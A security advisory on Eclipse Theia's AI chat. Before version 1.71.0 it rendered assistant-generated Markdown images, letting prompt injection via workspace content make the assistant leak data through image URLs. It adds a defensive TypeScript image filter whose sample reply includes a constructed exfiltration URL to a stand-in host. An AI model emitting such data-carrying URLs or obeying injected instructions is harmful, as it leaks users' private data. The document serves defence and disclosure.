Impact
In Eclipse Theia versions before 1.71.0 the AI chat feature renders any Markdown image tag produced by an AI assistant, causing the client to issue HTTP requests to external URLs without restriction. An attacker who can control workspace content or inject into the AI prompt can therefore make the client send requests to attacker-controlled servers whose URLs embed data from the workspace or conversation context, effectively exfiltrating sensitive information. The weakness aligns with CWE-201 (Insertion of Sensitive Information Into Sent Data) and CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).
Affected Systems
Any deployment of Eclipse Theia running a version older than 1.71.0 is affected. The vulnerability exists regardless of the operating system or host environment due to the universal nature of the Markdown rendering in the AI chat component.
Risk and Exploitability
The CVSS score of 6.7 indicates moderate severity. EPSS information is unavailable, and the vulnerability is not listed in CISA's KEV catalog, suggesting no confirmed exploitation yet. The likely attack vector requires the attacker to influence AI responses in an untrusted workspace; the attack chain entails injecting or modifying workspace content so that the assistant emits image URLs carrying confidential data. As mitigation, deployments running versions prior to 1.71.0 should upgrade, and AI features should be disabled in untrusted workspaces until then, which substantially reduces the exploitation risk.
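The mechanism above (an image tag in assistant output becomes an unsolicited outbound request) is typically closed on the rendering side by refusing to load remote images the user never approved. The following is an added, self-contained example and is not Theia's own code nor the fix shipped in 1.71.0, whose details this advisory does not describe; it assumes a hypothetical pre-render filter (`filterAiMarkdownImages`) that keeps relative paths and inline `data:image/` URIs, allows HTTPS images only from an explicit host allowlist, strips everything else before the Markdown reaches the renderer, and returns the removed URLs so they can be logged or alerted on. The sample assistant reply is constructed for the example.

```typescript
// Added example, not Eclipse Theia code: strip untrusted remote images from
// AI-generated Markdown before it is rendered, so the client never issues a
// request to a host the assistant (or whoever influenced it) chose.

// Matches ![alt](url) and ![alt](url "title"); the URL may not contain ')' or whitespace.
const IMAGE_RE = /!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;

export interface ImageFilterResult {
  markdown: string;  // rewritten Markdown that is safe to hand to the renderer
  blocked: string[]; // image URLs that were removed, for logging or alerting
}

// Parse an absolute URL, returning undefined instead of throwing on junk input.
function parseAbsoluteUrl(raw: string): URL | undefined {
  try {
    return new URL(raw);
  } catch (_e) {
    return undefined;
  }
}

// Decide whether loading this image could cause a request to leave the client
// towards a host that was not explicitly approved.
function isAllowedImageUrl(raw: string, allowedHosts: ReadonlySet<string>): boolean {
  // Inline image data never triggers a network request.
  if (raw.startsWith("data:image/")) return true;
  // Relative paths (no scheme, not protocol-relative) resolve inside the workspace.
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(raw);
  if (!hasScheme && !raw.startsWith("//")) return true;
  // Anything else must be an absolute HTTPS URL to an allowlisted host.
  const url = parseAbsoluteUrl(raw);
  if (url === undefined) return false;
  if (url.protocol !== "https:") return false;
  return allowedHosts.has(url.hostname.toLowerCase());
}

// Rewrite assistant Markdown: approved images pass through untouched, every
// other image reference is replaced by a visible marker that carries no URL.
export function filterAiMarkdownImages(
  markdown: string,
  allowedHosts: ReadonlySet<string> = new Set<string>(),
): ImageFilterResult {
  const blocked: string[] = [];
  const out = markdown.replace(IMAGE_RE, (match: string, alt: string, url: string) => {
    if (isAllowedImageUrl(url, allowedHosts)) return match;
    blocked.push(url);
    // Keep the alt text so the user can see that something was removed.
    return `[image removed: ${alt || "untrusted source"}]`;
  });
  return { markdown: out, blocked };
}

// Constructed sample assistant reply (hypothetical hosts, not from the advisory):
// a workspace-relative image, an allowlisted CDN image, a remote image whose
// query string would carry context out of the workspace, and an inline image.
export const SAMPLE_AI_REPLY = [
  "Here is the diagram you asked for:",
  "![architecture](./docs/arch.png)",
  "![logo](https://assets.example.com/logo.png)",
  "![x](https://collector.invalid/i.png?d=CONSTRUCTED_PLACEHOLDER)",
  "![](data:image/png;base64,iVBORw0KGgo=)",
].join("\n");

// Convenience entry point for a stand-alone run with a one-host allowlist.
export function demo(): ImageFilterResult {
  return filterAiMarkdownImages(SAMPLE_AI_REPLY, new Set(["assets.example.com"]));
}

const result = demo();
console.log(result.markdown);
console.log("blocked:", result.blocked);
```

With the allowlist `{assets.example.com}` only the `collector.invalid` reference is removed; with the default empty allowlist every remote image is removed, which is the conservative setting for an untrusted workspace. Logging `blocked` gives operators a cheap detection signal: an assistant reply that repeatedly references unapproved hosts with long query strings is worth investigating.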
OpenCVE Enrichment